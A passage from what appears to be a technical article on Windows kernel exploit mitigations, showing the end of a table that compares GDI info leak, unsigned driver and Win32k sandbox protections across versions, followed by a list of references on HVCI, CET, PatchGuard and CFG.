| GDI info leaks | Full | Partial | Patched | Patched | Patched | Patched |
| Unsigned drivers | - | - | HVCI(opt) | HVCI(opt) | HVCI(opt) | HVCI(default) |
| Win32k from sandbox | Partial | Partial | Syscall filter | Syscall filter | Syscall filter | Syscall filter |
References
- “Kernel Mitigation Improvements in Windows 11” — Microsoft Security Blog
- “HVCI Deep Dive” — Alex Ionescu, Crowdstrike
- “CET Internals” — Alex Ionescu, Winsider Seminars
- “PatchGuard Internals” — Alex Ionescu (various conference talks)
- “Bypassing CFG” — Yuki Chen, Trend Micro
